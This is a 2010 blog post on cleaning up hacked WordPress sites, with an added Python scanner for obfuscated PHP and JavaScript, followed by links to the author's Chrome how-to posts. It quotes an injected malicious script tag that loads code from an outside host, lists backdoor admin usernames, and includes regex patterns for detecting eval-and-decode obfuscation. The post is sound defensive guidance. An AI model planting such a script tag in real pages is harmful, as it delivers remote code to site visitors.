Recent WordPress Hacks on MediaTemple
written 28 Jul 2010 in the earliest morning
I am involved in dozens of websites, some of my own doing and others that I have created for clients at one point or another, almost every single one of which uses WordPress as a CMS. Though I mention the importance of keeping WordPress up to date, many of my clients just don’t bother: some are pre-WP 2.7, where updating would involve a good deal of FTPing that they are sometimes incapable of; some don’t want to pay me to do it; and most often they simply don’t realize how important it is. I’ve seen a rash of hacks to WordPress sites in the past week, and not only to out-of-date WP installations, but even to this site, which is running the latest version of WordPress and on a (supposedly very secure) MediaTemple server.
I thought I’d share a little information I’ve gathered on this subject, in case it might be helpful to anyone else out there.
Hardening WordPress Security
I won’t bother reprinting the entire article, because, well, that would be plagiarism, but there’s a bunch of useful information posted at Smashing Magazine on how to harden your WP installation. Read it here.
I particularly recommend steps 1 (especially if you don’t have any use for additional registered users other than admins, though if you do have other users, you might want to give this a skip), 3, 4, 5, 7, 8 and 9.
How to Find Compromised Files
I’ve noticed three main ways these hackers have changed my files, primarily by altering existing files but also by creating new files.
- Check your header.php and footer.php (the latter was a culprit more often than the former for me) for a bunch of extra code. It will look like unreadable, random letters and numbers. This is called obfuscated code, and the obfuscation makes it harder for antivirus software to detect. Once you find it, delete the heck out of it.
- Check any Javascript files, typically in your theme folder but possibly in your plugins folder or anywhere else on your site, for similar code, and remove it as well.
- A bit more tedious, go into your /wp-content/uploads folder and look for PHP files that are just named with numbers, such as 12345.php. Delete these. Really, there probably shouldn’t be any PHP files in your uploads folder, other than perhaps an index.php file.
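The three file checks above can be scripted so they are repeatable across many sites. The following is an added example, not code from the original post; the regular expressions are assumed heuristics (a long unbroken encoded-looking string, or `eval()` wrapped around a decoder), so every hit still needs a human look before anything is deleted.

```python
import os
import re
import sys

# Heuristics assumed for this example, not a complete malware signature set.
LONG_BLOB = re.compile(r"[A-Za-z0-9+/=]{200,}")
DECODE_EVAL = re.compile(
    r"eval\s*\(\s*(base64_decode|gzinflate|str_rot13|unescape)\s*\(", re.I)
NUMERIC_PHP = re.compile(r"^\d+\.php$")


def looks_obfuscated(text):
    """Return a reason string if text matches an obfuscation heuristic, else None."""
    if DECODE_EVAL.search(text):
        return "eval() around a decoder call"
    if LONG_BLOB.search(text):
        return "long unbroken encoded-looking string"
    return None


def scan_wordpress(root):
    """Walk a WordPress tree and return sorted (relative_path, reason) findings."""
    findings = []
    uploads = os.path.join("wp-content", "uploads")
    for dirpath, _dirs, files in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root)
        in_uploads = rel_dir == uploads or rel_dir.startswith(uploads + os.sep)
        for name in files:
            rel = os.path.normpath(os.path.join(rel_dir, name))
            lower = name.lower()
            # Check 3: PHP in uploads (index.php is the one expected exception).
            if in_uploads and lower.endswith(".php") and lower != "index.php":
                kind = "numeric-named PHP" if NUMERIC_PHP.match(lower) else "PHP file"
                findings.append((rel, kind + " in uploads"))
                continue
            # Checks 1 and 2: theme/plugin PHP and JavaScript with obfuscated code.
            if lower.endswith((".php", ".js")):
                with open(os.path.join(dirpath, name), errors="replace") as fh:
                    reason = looks_obfuscated(fh.read())
                if reason:
                    findings.append((rel, reason))
    return sorted(findings)


if __name__ == "__main__":
    for path, reason in scan_wordpress(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{path}: {reason}")
```

Run it with the WordPress root directory as the only argument; it only reports and never modifies or deletes files.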
I’ll update this post as I come across any further information on the subject.
Update 7/29/2010 1:11am. On a client’s very outdated site (WP 2.3.3) I found the following code injected directly into posts: <script src="http://ae.awaue.com/7"></script>. The client’s site also had a database error; it was odd that the injected malicious code would also break the database, preventing the site from being accessible and therefore the malicious code from working…
Update 7/29/2010 2:10am. It’s also a good idea to check your Users list for admins, particularly jonnya, jonnyb and amin. Delete ‘em.
More Posts in how-tos & web design (ing)
How to Add Javascript Applets to as Google Chrome Bookmarks
Javascript applets are little pieces of javascript that can do everything from modifying a website you’re on in a variety of ways to reorganizing the light spectrum of our universe to hex values, except that they probably can’t do that last bit. For all y’all website designers out there, and I’m talking to you Aunt Polly with your iWeb open trying to start up mycatgotstuckinavase.com/howcute, there’s a great service out there called Cross Browser Testing. I’ve already linked to it like a million times divided by 500,000, so I won’t again, except for right here, which lets you test websites in other browsers that you might not have, say, because you bought a MacBook to match your stainless steel fridge but you want to test in Internet Explorer and it’s only available on ugly computers. They offer one of these little Javascript applets that gives you one click access to their service so you can fire up your VNC client and be logged into a Windows machine somewhere in Tennessee faster than the Civil War is over (take down the flag, boys, you’re part of the Union now). Adding these applets to Google Chrome isn’t as drag-and-drop easy as it is in Firefox, though. Google decided that a Bookmark Toolbar would work best on a New Tab page, somewhat defeating the point of having a toolbar to prevent you from having to do unnecessary work. So for those who’d like to add an applet to their bookmarks in Chrome, here’s the how to.
Google Chrome Solutions: Bookmarks Dropdown Icon
For anyone who likes the idea of a bookmark’s toolbar and isn’t satisfied with the idea of it only appearing in the New Tab window of Google Chrome, but also doesn’t necessarily want a huge bar spanning the width of the browser (like in most other browsers, where your bookmarks are all listed below the address bar), there’s a great little dropdown solution via an extension called Bookmark Tree.
Google Chrome Solutions: How to Get Native Gmail Support in Google Chrome
How to Get Native Gmail Support in Google Chrome
Next in my list of irks was that Chrome didn’t support web-based email clients like Gmail, instead defaulting to opening whatever your operating system’s default mail client might be (Outlook, Mail, etc.) Via extensions, we have a few solutions to this problem:
Google Chrome Solutions: How to Get Nice Looking RSS Feeds in Google Chrome
Now that I’ve moaned and complained about everything that’s wrong with Google Chrome, I figured I should provide a few solutions to the problems I’ve mentioned previously. Chrome isn’t a bad browser: it’s fast, has a great Error Console, and thanks to extensions, most of the issues I’ve mentioned can easily be overcome. First we’ll cover:
Using Google Chrome, a Web Designer’s Experience, Part 5: The Little Things
I’ve discussed issues I’ve noticed with Google Chrome that are specifically related to using it for building web sites. There are a few other minor annoyances about Google Chrome that add up to big hassles when you combine the time they waste throughout the day, and these are likely to affect any user, not just those of us with our digital hard hats donned.
Using Google Chrome, a Web Designer’s Experience, Part 4: Bookmark’s Toolbar
Browser testing is essential, and I use a wonderful online browser testing solution from Cross Browser Testing. It has this great feature where you can add a Javascript booklet to your toolbar, visit the page you want to test, click the booklet and it’ll open up a VPN connection to the machine / browser combination of your choice. The process is so incredibly simple that it makes browser testing as easy as Tony Hawk’s video game empire made skateboarding for posers.
Using Google Chrome, a Web Designer’s Experience, Part 3: Webkit Annoyances
It’s already annoying enough that Mac browsers render fonts all nice and perfectly smooth while Windows machines still refuse to automatically implement anti-aliasing on fonts. Aside from making fonts (and the @font-face CSS rule that’s now a reality) look bad on every browser available to Windowleans, it comes with the side effect that Mac browsers will often render type that takes up fewer pixels on the screen itself. This can be an issue when the length of your text matters. For example, say you have a background image for your navigation bar. You want to have part of the navigation bar’s background blue while the rest of the bar is red, but you don’t want to use any image replacement technique for rendering the text itself (you might have a dynamic menu bar running off of your CMS so that when the pages on your site are updated, the navigation bar is as well). If your text renders at different sizes on different operating systems, you need to provide different CSS to each OS. Annoying, but doable.
Using Google Chrome, a Web Designer’s Experience, Part 2: Inspect Element
Firebug is like a baby made of candy. If you don’t get that analogy, no one will blame you but best not to bring it up around the hitching post, water cooler or back of the garbage truck, wherever you take your particular daily break. Suffice to say, this little plugin developed for Firefox is like having a twin brother who will go to school for you, do all of your homework, sit in the waiting room until the doctor is ready to see you and let you take his girlfriend home after he did all of the wining and dining.
Using Google Chrome, a Web Designer’s Experience, Part 1: The History of My Web Browser
I jumped on the Firefox train as quickly as any other up and coming computer nerd Web Designer hopeful way back in the turn of November, 2004. How wonderful were those days? Blogging was cool, Google didn’t have a sidebar and when I went to the bar with my friends, no one sat on their phone showing me how great the latest app that tracked everything you do everywhere you go was the whole time.
